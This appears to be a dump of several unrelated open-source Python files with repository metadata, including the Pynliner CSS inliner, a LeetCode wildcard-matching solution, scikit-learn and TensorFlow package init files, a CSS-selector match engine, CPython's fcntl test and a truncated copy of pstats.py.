item = QtGui.QStandardItem(YeastView(y).yeastDetailDisplay())
item.setData(y, view.constants.MODEL_DATA_ROLE)
model.appendRow(item)
return model
|
gpl-3.0
|
mihaip/NewsBlur
|
vendor/pynliner/__init__.py
|
19
|
9059
|
#!/usr/bin/env python
"""Pynliner : Convert CSS to inline styles
Python CSS-to-inline-styles conversion tool for HTML using BeautifulSoup and cssutils
Copyright (c) 2011 Tanner Netterville
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
The generated output of this software shall not be used in a mass marketing service.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
__version__ = "0.4.0"
import urllib2
import cssutils
from BeautifulSoup import BeautifulSoup
from soupselect import select
class Pynliner(object):
"""Pynliner class"""
soup = False
style_string = False
stylesheet = False
output = False
def __init__(self, log=None):
self.log = log
cssutils.log.enabled = False if log is None else True
def from_url(self, url):
"""Gets remote HTML page for conversion
Downloads HTML page from `url` as a string and passes it to the
`from_string` method. Also sets `self.root_url` and `self.relative_url`
for use in importing <link> elements.
Returns self.
>>> p = Pynliner()
>>> p.from_url('http://somewebsite.com/file.html')
<Pynliner object at 0x26ac70>
"""
self.url = url
self.relative_url = '/'.join(url.split('/')[:-1]) + '/'
self.root_url = '/'.join(url.split('/')[:3])
self.source_string = self._get_url(self.url)
return self
def from_string(self, string):
"""Generates a Pynliner object from the given HTML string.
Returns self.
>>> p = Pynliner()
>>> p.from_string('<style>h1 { color:#ffcc00; }</style><h1>Hello World!</h1>')
<Pynliner object at 0x26ac70>
"""
self.source_string = string
return self
def with_cssString(self, cssString):
"""Adds external CSS to the Pynliner object. Can be "chained".
Returns self.
>>> html = "<h1>Hello World!</h1>"
>>> css = "h1 { color:#ffcc00; }"
>>> p = Pynliner()
>>> p.from_string(html).with_cssString(css)
<pynliner.Pynliner object at 0x2ca810>
"""
if not self.style_string:
self.style_string = cssString + u'\n'
else:
self.style_string += cssString + u'\n'
return self
def run(self):
"""Applies each step of the process if they have not already been
performed.
Returns Unicode output with applied styles.
>>> html = "<style>h1 { color:#ffcc00; }</style><h1>Hello World!</h1>"
>>> Pynliner().from_string(html).run()
u'<h1 style="color: #fc0">Hello World!</h1>'
"""
if not self.soup:
self._get_soup()
if not self.stylesheet:
self._get_styles()
self._apply_styles()
return self._get_output()
def _get_url(self, url):
"""Returns the response content from the given url
"""
return urllib2.urlopen(url).read()
def _get_soup(self):
"""Convert source string to BeautifulSoup object. Sets it to self.soup.
If using mod_wgsi, use html5 parsing to prevent BeautifulSoup incompatibility.
"""
# Check if mod_wsgi is running - see http://code.google.com/p/modwsgi/wiki/TipsAndTricks
try:
from mod_wsgi import version
self.soup = BeautifulSoup(self.source_string, "html5lib")
except:
self.soup = BeautifulSoup(self.source_string)
def _get_styles(self):
"""Gets all CSS content from and removes all <link rel="stylesheet"> and
<style> tags concatenating into one CSS string which is then parsed with
cssutils and the resulting CSSStyleSheet object set to
`self.stylesheet`.
"""
self._get_external_styles()
self._get_internal_styles()
cssparser = cssutils.CSSParser(log=self.log)
self.stylesheet = cssparser.parseString(self.style_string)
def _get_external_styles(self):
"""Gets <link> element styles
"""
if not self.style_string:
self.style_string = u''
else:
self.style_string += u'\n'
link_tags = self.soup.findAll('link', {'rel': 'stylesheet'})
for tag in link_tags:
url = tag['href']
if url.startswith('http://'):
pass
elif url.startswith('/'):
url = self.root_url + url
else:
url = self.relative_url + url
self.style_string += self._get_url(url)
tag.extract()
def _get_internal_styles(self):
"""Gets <style> element styles
"""
if not self.style_string:
self.style_string = u''
else:
self.style_string += u'\n'
style_tags = self.soup.findAll('style')
for tag in style_tags:
self.style_string += u'\n'.join(tag.contents) + u'\n'
tag.extract()
def _get_specificity_from_list(self, lst):
"""
Takes an array of ints and returns an integer formed
by adding all ints multiplied by the power of 10 of the current index
(1, 0, 0, 1) => (1 * 10**3) + (0 * 10**2) + (0 * 10**1) + (1 * 10**0) => 1001
"""
return int(''.join(map(str, lst)))
def _get_rule_specificity(self, rule):
"""
For a given CSSRule get its selector specificity in base 10
"""
return sum(map(self._get_specificity_from_list, (s.specificity for s in rule.selectorList)))
def _apply_styles(self):
"""Steps through CSS rules and applies each to all the proper elements
as @style attributes prepending any current @style attributes.
"""
rules = self.stylesheet.cssRules.rulesOfType(1)
elem_prop_map = {}
elem_style_map = {}
# build up a property list for every styled element
for rule in rules:
# select elements for every selector
selectors = rule.selectorText.split(',')
elements = []
for selector in selectors:
elements += select(self.soup, selector)
# build prop_list for each selected element
for elem in elements:
if elem not in elem_prop_map:
elem_prop_map[elem] = []
elem_prop_map[elem].append({
'specificity': self._get_rule_specificity(rule),
'props': rule.style.getProperties(),
})
# build up another property list using selector specificity
for elem, props in elem_prop_map.items():
if elem not in elem_style_map:
elem_style_map[elem] = cssutils.css.CSSStyleDeclaration()
# ascending sort of prop_lists based on specificity
props = sorted(props, key=lambda p: p['specificity'])
# for each prop_list, apply to CSSStyleDeclaration
for prop_list in map(lambda obj: obj['props'], props):
for prop in prop_list:
elem_style_map[elem][prop.name] = prop.value
# apply rules to elements
for elem, style_declaration in elem_style_map.items():
if elem.has_key('style'):
elem['style'] = u'%s; %s' % (style_declaration.cssText.replace('\n', ' '), elem['style'])
else:
elem['style'] = style_declaration.cssText.replace('\n', ' ')
def _get_output(self):
"""Generate Unicode string of `self.soup` and set it to `self.output`
Returns self.output
"""
self.output = unicode(str(self.soup))
return self.output
def fromURL(url, log=None):
"""Shortcut Pynliner constructor. Equivelent to:
>>> Pynliner().from_url(someURL).run()
Returns processed HTML string.
"""
return Pynliner(log).from_url(url).run()
def fromString(string, log=None):
"""Shortcut Pynliner constructor. Equivelent to:
>>> Pynliner().from_string(someString).run()
Returns processed HTML string.
"""
return Pynliner(log).from_string(string).run()
|
mit
|
shawncaojob/LC
|
QUESTIONS/44_wildcard_matching.py
|
1
|
1859
|
# 44. Wildcard Matching My Submissions QuestionEditorial Solution
# Total Accepted: 59032 Total Submissions: 333961 Difficulty: Hard
# Implement wildcard pattern matching with support for '?' and '*'.
#
# '?' Matches any single character.
# '*' Matches any sequence of characters (including the empty sequence).
#
# The matching should cover the entire input string (not partial).
#
# The function prototype should be:
# bool isMatch(const char *s, const char *p)
#
# Some examples:
# isMatch("aa","a") false
# isMatch("aa","aa") true
# isMatch("aaa","aa") false
# isMatch("aa", "*") true
# isMatch("aa", "a*") true
# isMatch("ab", "?*") true
# isMatch("aab", "c*a*b") false
class Solution(object):
def isMatch(self, s, p):
"""
:type s: str
:type p: str
:rtype: bool
"""
print(s, p)
m, n = len(s), len(p)
dp = [ [ False for y in xrange(n + 1) ] for x in xrange(m + 1) ]
dp[0][0] = True
for j in xrange(1, n + 1):
if p[j-1] == "*" and dp[0][j-1]:
dp[0][j] = True
for i in xrange(1, m + 1):
for j in xrange(1, n + 1):
if (s[i-1] == p[j-1] or p[j-1] == "?") and dp[i-1][j-1]: #Cur char matching
dp[i][j] = True
if p[j-1] == "*":
if dp[i][j-1] or dp[i-1][j]: # Matching 0 or more
dp[i][j] = True
for row in dp:
print(row)
return dp[-1][-1]
if __name__ == "__main__":
print(Solution().isMatch("aa","a"))
print(Solution().isMatch("aa","aa"))
print(Solution().isMatch("aaa","aa"))
print(Solution().isMatch("aa", "*"))
print(Solution().isMatch("aa", "a*"))
print(Solution().isMatch("ab", "?*"))
print(Solution().isMatch("aab", "c*a*b"))
|
gpl-3.0
|
aminert/scikit-learn
|
sklearn/feature_selection/__init__.py
|
244
|
1088
|
"""
The :mod:`sklearn.feature_selection` module implements feature selection
algorithms. It currently includes univariate filter selection methods and the
recursive feature elimination algorithm.
"""
from .univariate_selection import chi2
from .univariate_selection import f_classif
from .univariate_selection import f_oneway
from .univariate_selection import f_regression
from .univariate_selection import SelectPercentile
from .univariate_selection import SelectKBest
from .univariate_selection import SelectFpr
from .univariate_selection import SelectFdr
from .univariate_selection import SelectFwe
from .univariate_selection import GenericUnivariateSelect
from .variance_threshold import VarianceThreshold
from .rfe import RFE
from .rfe import RFECV
__all__ = ['GenericUnivariateSelect',
'RFE',
'RFECV',
'SelectFdr',
'SelectFpr',
'SelectFwe',
'SelectKBest',
'SelectPercentile',
'VarianceThreshold',
'chi2',
'f_classif',
'f_oneway',
'f_regression']
|
bsd-3-clause
|
Kongsea/tensorflow
|
tensorflow/python/keras/applications/inception_resnet_v2/__init__.py
|
23
|
1193
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""InceptionResNetV2 Keras application."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.keras._impl.keras.applications.inception_resnet_v2 import decode_predictions
from tensorflow.python.keras._impl.keras.applications.inception_resnet_v2 import InceptionResNetV2
from tensorflow.python.keras._impl.keras.applications.inception_resnet_v2 import preprocess_input
del absolute_import
del division
del print_function
|
apache-2.0
|
caioariede/pyq
|
sizzle/match.py
|
1
|
3323
|
from .selector import Selector
class MatchEngine(object):
pseudo_fns = {}
selector_class = Selector
def __init__(self):
self.register_pseudo('not', self.pseudo_not)
self.register_pseudo('has', self.pseudo_has)
def register_pseudo(self, name, fn):
self.pseudo_fns[name] = fn
@staticmethod
def pseudo_not(matcher, node, value):
return not matcher.match_node(matcher.parse_selector(value)[0], node)
@staticmethod
def pseudo_has(matcher, node, value):
for node, body in matcher.iter_data([node]):
if body:
return any(
matcher.match_data(matcher.parse_selector(value)[0], body))
def parse_selector(self, selector):
return self.selector_class.parse(selector)
def match(self, selector, data):
selectors = self.parse_selector(selector)
nodeids = {}
for selector in selectors:
for node in self.match_data(selector, data):
nodeid = id(node)
if nodeid not in nodeids:
nodeids[nodeid] = None
yield node
def match_data(self, selector, data):
for node, body in self._iter_data(data):
match = self.match_node(selector, node)
if match:
next_selector = selector.next_selector
if next_selector:
if body:
for node in self.match_data(next_selector, body):
yield node
else:
yield node
if body and not selector.combinator == self.selector_class.CHILD:
for node in self.match_data(selector, body):
yield node
def match_node(self, selector, node):
match = all(self.match_rules(selector, node))
if match and selector.attrs:
match &= all(self.match_attrs(selector, node))
if match and selector.pseudos:
match &= all(self.match_pseudos(selector, node))
return match
def match_rules(self, selector, node):
if selector.typ:
yield self.match_type(selector.typ, node)
if selector.id_:
yield self.match_id(selector.id_, node)
def match_attrs(self, selector, node):
for a in selector.attrs:
lft, op, rgt = a
yield self.match_attr(lft, op, rgt, node)
def match_pseudos(self, selector, d):
for p in selector.pseudos:
name, value = p
if name not in self.pseudo_fns:
raise Exception('Selector not implemented: {}'.format(name))
yield self.pseudo_fns[name](self, d, value)
def _iter_data(self, data):
for tupl in self.iter_data(data):
if len(tupl) != 2:
raise Exception(
'The iter_data method must yield pair tuples containing '
'the node and its body (empty if not available)')
yield tupl
def match_type(self, typ, node):
raise NotImplementedError
def match_id(self, id_, node):
raise NotImplementedError
def match_attr(self, lft, op, rgt, no):
raise NotImplementedError
def iter_data(self, data):
raise NotImplementedError
|
mit
|
MalloyPower/parsing-python
|
front-end/testsuite-python-lib/Python-3.3.0/Lib/test/test_fcntl.py
|
5
|
2984
|
"""Test program for the fcntl C module.
OS/2+EMX doesn't support the file locking operations.
"""
import os
import struct
import sys
import unittest
from test.support import verbose, TESTFN, unlink, run_unittest, import_module
# Skip test if no fnctl module.
fcntl = import_module('fcntl')
# TODO - Write tests for flock() and lockf().
def get_lockdata():
try:
os.O_LARGEFILE
except AttributeError:
start_len = "ll"
else:
start_len = "qq"
if (sys.platform.startswith(('netbsd', 'freebsd', 'openbsd', 'bsdos'))
or sys.platform == 'darwin'):
if struct.calcsize('l') == 8:
off_t = 'l'
pid_t = 'i'
else:
off_t = 'lxxxx'
pid_t = 'l'
lockdata = struct.pack(off_t + off_t + pid_t + 'hh', 0, 0, 0,
fcntl.F_WRLCK, 0)
elif sys.platform in ['aix3', 'aix4', 'hp-uxB', 'unixware7']:
lockdata = struct.pack('hhlllii', fcntl.F_WRLCK, 0, 0, 0, 0, 0, 0)
elif sys.platform in ['os2emx']:
lockdata = None
else:
lockdata = struct.pack('hh'+start_len+'hh', fcntl.F_WRLCK, 0, 0, 0, 0, 0)
if lockdata:
if verbose:
print('struct.pack: ', repr(lockdata))
return lockdata
lockdata = get_lockdata()
class TestFcntl(unittest.TestCase):
def setUp(self):
self.f = None
def tearDown(self):
if self.f and not self.f.closed:
self.f.close()
unlink(TESTFN)
def test_fcntl_fileno(self):
# the example from the library docs
self.f = open(TESTFN, 'wb')
rv = fcntl.fcntl(self.f.fileno(), fcntl.F_SETFL, os.O_NONBLOCK)
if verbose:
print('Status from fcntl with O_NONBLOCK: ', rv)
if sys.platform not in ['os2emx']:
rv = fcntl.fcntl(self.f.fileno(), fcntl.F_SETLKW, lockdata)
if verbose:
print('String from fcntl with F_SETLKW: ', repr(rv))
self.f.close()
def test_fcntl_file_descriptor(self):
# again, but pass the file rather than numeric descriptor
self.f = open(TESTFN, 'wb')
rv = fcntl.fcntl(self.f, fcntl.F_SETFL, os.O_NONBLOCK)
if sys.platform not in ['os2emx']:
rv = fcntl.fcntl(self.f, fcntl.F_SETLKW, lockdata)
self.f.close()
def test_fcntl_64_bit(self):
# Issue #1309352: fcntl shouldn't fail when the third arg fits in a
# C 'long' but not in a C 'int'.
try:
cmd = fcntl.F_NOTIFY
# This flag is larger than 2**31 in 64-bit builds
flags = fcntl.DN_MULTISHOT
except AttributeError:
self.skipTest("F_NOTIFY or DN_MULTISHOT unavailable")
fd = os.open(os.path.dirname(os.path.abspath(TESTFN)), os.O_RDONLY)
try:
fcntl.fcntl(fd, cmd, flags)
finally:
os.close(fd)
def test_main():
run_unittest(TestFcntl)
if __name__ == '__main__':
test_main()
|
mit
|
tunneln/CarnotKE
|
jyhton/lib-python/2.7/pstats.py
|
117
|
26711
|
"""Class for printing reports on profiled python code."""
# Written by James Roskind
# Based on prior profile module by Sjoerd Mullender...
# which was hacked somewhat by: Guido van Rossum
# Copyright Disney Enterprises, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
import sys
import os
import time
import marshal
import re
from functools import cmp_to_key
__all__ = ["Stats"]
class Stats:
"""This class is used for creating reports from data generated by the
Profile class. It is a "friend" of that class, and imports data either
by direct access to members of Profile class, or by reading in a dictionary
that was emitted (via marshal) from the Profile class.
The big change from the previous Profiler (in terms of raw functionality)
is that an "add()" method has been provided to combine Stats from
several distinct profile runs. Both the constructor and the add()
method now take arbitrarily many file names as arguments.
All the print methods now take an argument that indicates how many lines
to print. If the arg is a floating point number between 0 and 1.0, then
it is taken as a decimal percentage of the available lines to be printed
(e.g., .1 means print 10% of all available lines). If it is an integer,
it is taken to mean the number of lines of data that you wish to have
printed.
The sort_stats() method now processes some additional options (i.e., in
addition to the old -1, 0, 1, or 2). It takes an arbitrary number of
quoted strings to select the sort order. For example sort_stats('time',
'name') sorts on the major key of 'internal function time', and on the
minor key of 'the name of the function'. Look at the two tables in
sort_stats() and get_sort_arg_defs(self) for more examples.
All methods return self, so you can string together commands like:
Stats('foo', 'goo').strip_dirs().sort_stats('calls').\
print_stats(5).print_callers(5)
"""
def __init__(self, *args, **kwds):
# I can't figure out how to explictly specify a stream keyword arg
# with *args:
# def __init__(self, *args, stream=sys.stdout): ...
# so I use **kwds and sqauwk if something unexpected is passed in.
self.stream = sys.stdout
if "stream" in kwds:
self.stream = kwds["stream"]
del kwds["stream"]
if kwds:
keys = kwds.keys()
keys.sort()
extras = ", ".join(["%s=%s" % (k, kwds[k]) for k in keys])
raise ValueError, "unrecognized keyword args: %s" % extras
if not len(args):
arg = None
else:
arg = args[0]
args = args[1:]
self.init(arg)
self.add(*args)
def init(self, arg):
self.all_callees = None # calc only if needed
self.files = []
self.fcn_list = None
self.total_tt = 0
self.total_calls = 0
self.prim_calls = 0
self.max_name_len = 0
self.top_level = {}
self.stats = {}
self.sort_arg_dict = {}
self.load_stats(arg)
trouble = 1
try:
self.get_top_level_stats()
trouble = 0
finally:
if trouble:
print >> self.stream, "Invalid timing data",
if self.files: print >> self.stream, self.files[-1],
print >> self.stream
def load_stats(self, arg):
if not arg: self.stats = {}
elif isinstance(arg, basestring):
f = open(arg, 'rb')
self.stats = marshal.load(f)
f.close()
try:
file_stats = os.stat(arg)
arg = time.ctime(file_stats.st_mtime) + " " + arg
except: # in case this is not unix
pass
self.files = [ arg ]
elif hasattr(arg, 'create_stats'):
arg.create_stats()
self.stats = arg.stats
arg.stats = {}
if not self.stats:
raise TypeError("Cannot create or construct a %r object from %r"
% (self.__class__, arg))
return
def get_top_level_stats(self):
for func, (cc, nc, tt, ct, callers) in self.stats.items():
self.total_calls += nc
self.prim_calls += cc
self.total_tt += tt
if ("jprofile", 0, "profiler") in callers:
self.top_level[func] = None
if len(func_std_string(func)) > self.max_name_len:
self.max_name_len = len(func_std_string(func))
def add(self, *arg_list):
if not arg_list: return self
if len(arg_list) > 1: self.add(*arg_list[1:])
other = arg_list[0]
if type(self) != type(other) or self.__class__ != other.__class__:
other = Stats(other)
self.files += other.files
self.total_calls += other.total_calls
self.prim_calls += other.prim_calls
self.total_tt += other.total_tt
for func in other.top_level:
self.top_level[func] = None
if self.max_name_len < other.max_name_len:
self.max_name_len = other.max_name_len
self.fcn_list = None
for func, stat in other.stats.iteritems():
if func in self.stats:
old_func_stat = self.stats[func]
else:
old_func_stat = (0, 0, 0, 0, {},)
self.stats[func] = add_func_stats(old_func_stat, stat)
return self
def dump_stats(self, filename):
"""Write the profile data to a file we know how to load back."""
f = file(filename, 'wb')
try:
marshal.dump(self.stats, f)
finally:
f.close()
# list the tuple indices and directions for sorting,
# along with some printable description
sort_arg_dict_default = {
"calls" : (((1,-1), ), "call count"),
"ncalls" : (((1,-1), ), "call count"),
"cumtime" : (((3,-1), ), "cumulative time"),
"cumulative": (((3,-1), ), "cumulative time"),
"file" : (((4, 1), ), "file name"),
"filename" : (((4, 1), ), "file name"),
"line" : (((5, 1), ), "line number"),
"module" : (((4, 1), ), "file name"),
"name" : (((6, 1), ), "function name"),
"nfl" : (((6, 1),(4, 1),(5, 1),), "name/file/line"),
"pcalls" : (((0,-1), ), "primitive call count"),
"stdname" : (((7, 1), ), "standard name"),
"time" : (((2,-1), ), "internal time"),
"tottime" : (((2,-1), ), "internal time"),
}
def get_sort_arg_defs(self):
"""Expand all abbreviations that are unique."""
if not self.sort_arg_dict:
self.sort_arg_dict = dict = {}
bad_list = {}
for word, tup in self.sort_arg_dict_default.iteritems():
fragment = word
while fragment:
if not fragment:
break
if fragment in dict:
bad_list[fragment] = 0
break
dict[fragment] = tup
fragment = fragment[:-1]
for word in bad_list:
del dict[word]
return self.sort_arg_dict
def sort_stats(self, *field):
if not field:
self.fcn_list = 0
return self
if len(field) == 1 and isinstance(field[0], (int, long)):
# Be compatible with old profiler
field = [ {-1: "stdname",
0: "calls",
1: "time",
2: "cumulative"}[field[0]] ]
sort_arg_defs = self.get_sort_arg_defs()
sort_tuple = ()
self.sort_type = ""
connector = ""
for word in field:
sort_tuple = sort_tuple + sort_arg_defs[word][0]
self.sort_type += connector + sort_arg_defs[word][1]
connector = ", "
stats_list = []
for func, (cc, nc, tt, ct, callers) in self.stats.iteritems():
stats_list.append((cc, nc, tt, ct) + func +
(func_std_string(func), func))
stats_list.sort(key=cmp_to_key(TupleComp(sort_tuple).compare))
self.fcn_list = fcn_list = []
for tuple in stats_list:
fcn_list.append(tuple[-1])
return self
def reverse_order(self):
if self.fcn_list:
self.fcn_list.reverse()
return self
def strip_dirs(self):
oldstats = self.stats
self.stats = newstats = {}
max_name_len = 0
for func, (cc, nc, tt, ct, callers) in oldstats.iteritems():
newfunc = func_strip_path(func)
if len(func_std_string(newfunc)) > max_name_len:
max_name_len = len(func_std_string(newfunc))
newcallers = {}
for func2, caller in callers.iteritems():
newcallers[func_strip_path(func2)] = caller
if newfunc in newstats:
newstats[newfunc] = add_func_stats(
newstats[newfunc],
(cc, nc, tt, ct, newcallers))
else:
newstats[newfunc] = (cc, nc, tt, ct, newcallers)
old_top = self.top_level
self.top_level = new_top = {}
for func in old_top:
new_top[func_strip_path(func)] = None
self.max_name_len = max_name_len
self.fcn_list = None
self.all_callees = None
return self
def calc_callees(self):
if self.all_callees: return
self.all_callees = all_callees = {}
for func, (cc, nc, tt, ct, callers) in self.stats.iteritems():
if not func in all_callees:
all_callees[func] = {}
for func2, caller in callers.iteritems():
if not func2 in all_callees:
all_callees[func2] = {}
all_callees[func2][func] = caller
return
#******************************************************************
# The following functions support actual printing of reports
#******************************************************************
# Optional "amount" is either a line count, or a percentage of lines.
def eval_print_amount(self, sel, list, msg):
new_list = list
if isinstance(sel, basestring):
try:
rex = re.compile(sel)
except re.error:
msg += " <Invalid regular expression %r>\n" % sel
return new_list, msg
new_list = []
for func in list:
if rex.search(func_std_string(func)):
new_list.append(func)
else:
count = len(list)
if isinstance(sel, float) and 0.0 <= sel < 1.0:
count = int(count * sel + .5)
new_list = list[:count]
elif isinstance(sel, (int, long)) and 0 <= sel < count:
count = sel
new_list = list[:count]
if len(list) != len(new_list):
msg += " List reduced from %r to %r due to restriction <%r>\n" % (
len(list), len(new_list), sel)
return new_list, msg
def get_print_list(self, sel_list):
width = self.max_name_len
if self.fcn_list:
stat_list = self.fcn_list[:]
msg = " Ordered by: " + self.sort_type + '\n'
else:
stat_list = self.stats.keys()
msg = " Random listing order was used\n"
for selection in sel_list:
stat_list, msg = self.eval_print_amount(selection, stat_list, msg)
count = len(stat_list)
if not stat_list:
return 0, stat_list
print >> self.stream, msg
if count < len(self.stats):
width = 0
for func in stat_list:
if len(func_std_string(func)) > width:
width = len(func_std_string(func))
return width+2, stat_list
def print_stats(self, *amount):
for filename in self.files:
print >> self.stream, filename
if self.files: print >> self.stream
indent = ' ' * 8
for func in self.top_level:
print >> self.stream, indent, func_get_function_name(func)
print >> self.stream, indent, self.total_calls, "function calls",
if self.total_calls != self.prim_calls:
print >> self.stream, "(%d primitive calls)" % self.prim_calls,
print >> self.stream, "in %.3f seconds" % self.total_tt
print >> self.stream
width, list = self.get_print_list(amount)
if list:
self.print_title()
for func in list:
self.print_line(func)
print >> self.stream
print >> self.stream
return self
def print_callees(self, *amount):
width, list = self.get_print_list(amount)
if list:
self.calc_callees()
self.print_call_heading(width, "called...")
for func in list:
if func in self.all_callees:
self.print_call_line(width, func, self.all_callees[func])
else:
self.print_call_line(width, func, {})
print >> self.stream
print >> self.stream
return self
def print_callers(self, *amount):
width, list = self.get_print_list(amount)
if list:
self.print_call_heading(width, "was called by...")
for func in list:
cc, nc, tt, ct, callers = self.stats[func]
self.print_call_line(width, func, callers, "<-")
print >> self.stream
print >> self.stream
return self
def print_call_heading(self, name_size, column_title):
print >> self.stream, "Function ".ljust(name_size) + column_title
# print sub-header only if we have new-style callers
subheader = False
for cc, nc, tt, ct, callers in self.stats.itervalues():
if callers:
value = callers.itervalues().next()
subheader = isinstance(value, tuple)
break
if subheader:
print >> self.stream, " "*name_size + " ncalls tottime cumtime"
def print_call_line(self, name_size, source, call_dict, arrow="->"):
print >> self.stream, func_std_string(source).ljust(name_size) + arrow,
if not call_dict:
print >> self.stream
return
clist = call_dict.keys()
clist.sort()
indent = ""
for func in clist:
name = func_std_string(func)
value = call_dict[func]
if isinstance(value, tuple):
nc, cc, tt, ct = value
if nc != cc:
substats = '%d/%d' % (nc, cc)
else:
substats = '%d' % (nc,)
substats = '%s %s %s %s' % (substats.rjust(7+2*len(indent)),
f8(tt), f8(ct), name)
left_width = name_size + 1
else:
substats = '%s(%r) %s' % (name, value, f8(self.stats[func][3]))
left_width = name_size + 3
print >> self.stream, indent*left_width + substats
indent = " "
def print_title(self):
print >> self.stream, ' ncalls tottime percall cumtime percall',
print >> self.stream, 'filename:lineno(function)'
def print_line(self, func): # hack : should print percentages
cc, nc, tt, ct, callers = self.stats[func]
c = str(nc)
if nc != cc:
c = c + '/' + str(cc)
print >> self.stream, c.rjust(9),
print >> self.stream, f8(tt),
if nc == 0:
print >> self.stream, ' '*8,
else:
print >> self.stream, f8(float(tt)/nc),
print >> self.stream, f8(ct),
if cc == 0:
print >> self.stream, ' '*8,
else:
print >> self.stream, f8(float(ct)/cc),
print >> self.stream, func_std_string(func)
class TupleComp:
"""This class provides a generic function for comparing any two tuples.
Each instance records a list of tuple-indices (from most significant
to least significant), and sort direction (ascending or decending) for
each tuple-index. The compare functions can then be used as the function
argument to the system sort() function when a list of tuples need to be
sorted in the instances order."""
def __init__(self, comp_select_list):
self.comp_select_list = comp_select_list
def compare (self, left, right):
for index, direction in self.comp_select_list:
l = left[index]
r = right[index]
if l < r:
return -direction
if l > r:
return direction
return 0
#**************************************************************************
# func_name is a triple (file:string, line:int, name:string)
def func_strip_path(func_name):
filename, line, name = func_name
return os.path.basename(filename), line, name
def func_get_function_name(func):
return func[2]
def func_std_string(func_name): # match what old profile produced
if func_name[:2] == ('~', 0):
# special case for built-in functions
name = func_name[2]
if name.startswith('<') and name.endswith('>'):
return '{%s}' % name[1:-1]
else:
return name
else:
return "%s:%d(%s)" % func_name
#**************************************************************************
# The following functions combine statists for pairs functions.
# The bulk of the processing involves correctly handling "call" lists,
# such as callers and callees.
#**************************************************************************
def add_func_stats(target, source):
"""Add together all the stats for two profile entries."""
cc, nc, tt, ct, callers = source
t_cc, t_nc, t_tt, t_ct, t_callers = target
return (cc+t_cc, nc+t_nc, tt+t_tt, ct+t_ct,
add_callers(t_callers, callers))
def add_callers(target, source):
"""Combine two caller lists in a single list."""
new_callers = {}
for func, caller in target.iteritems():
new_callers[func] = caller
for func, caller in source.iteritems():
if func in new_callers:
if isinstance(caller, tuple):
# format used by cProfile
new_callers[func] = tuple([i[0] + i[1] for i in
zip(caller, new_callers[func])])
else:
# format used by profile
new_callers[func] += caller
else:
new_callers[func] = caller
return new_callers
def count_calls(callers):
"""Sum the caller statistics to get total number of calls received."""
nc = 0
for calls in callers.itervalues():
nc += calls
return nc
#**************************************************************************
# The following functions support printing of reports
#**************************************************************************
def f8(x):
return "%8.3f" % x
#**************************************************************************
# Statistics browser added by ESR, April 2001
#**************************************************************************
if __name__ == '__main__':
import cmd
try:
import readline
except ImportError:
pass
class ProfileBrowser(cmd.Cmd):
def __init__(self, profile=None):
cmd.Cmd.__init__(self)
self.prompt = "% "
self.stats = None
self.stream = sys.stdout
if profile is not None:
self.do_read(profile)
def generic(self, fn, line):
args = line.split()
processed = []
for term in args:
try:
processed.append(int(term))
continue
except ValueError:
pass
try:
frac = float(term)
if frac > 1 or frac < 0:
print >> self.stream, "Fraction argument must be in [0, 1]"
continue
processed.append(frac)
continue
except ValueError:
pass
processed.append(term)
if self.stats:
getattr(self.stats, fn)(*processed)
else:
print >> self.stream, "No statistics object is loaded."
return 0
def generic_help(self):
print >> self.stream, "Arguments may be:"
print >> self.stream, "* An integer maximum number of entries to print."
print >> self.stream, "* A decimal fractional number between 0 and 1, controlling"
print >> self.stream, " what fraction of selected entries to print."
print >> self.stream, "* A regular expression; only entries with function names"
print >> self.stream, " that match it are printed."
def do_add(self, line):
if self.stats:
self.stats.add(line)
else:
print >> self.stream, "No statistics object is loaded."
return 0
def help_add(self):
print >> self.stream, "Add profile info from given file to current statistics object."
def do_callees(self, line):
return self.generic('print_callees', line)
def help_callees(self):
print >> self.stream, "Print callees statistics from the current stat object."
self.generic_help()
def do_callers(self, line):
return self.generic('print_callers', line)
def help_callers(self):
print >> self.stream, "Print callers statistics from the current stat object."
self.generic_help()
def do_EOF(self, line):
print >> self.stream, ""
return 1
def help_EOF(self):
print >> self.stream, "Leave the profile brower."
def do_quit(self, line):
return 1
def help_quit(self):
print >> self.stream, "Leave the profile brower."
def do_read(self, line):
if line:
try:
self.stats = Stats(line)
except IOError, args:
print >> self.stream, args[1]
return
except Exception as err:
print >> self.stream, err.__class__.__name__ + ':', err
return
self.prompt = line + "% "
elif len(self.prompt) > 2:
line = self.prompt[:-2]
self.do_read(line)
else:
print >> self.stream, "No statistics object is current -- cannot reload."
return 0
def help_read(self):
print >> self.stream, "Read in profile data from a specified file."
print >> self.stream, "Without argument, reload the current file."
def do_reverse(self, line):
if self.stats:
self.stats.reverse_order()
else:
print >> self.stream, "No statistics object is loaded."
return 0
def help_reverse(self):
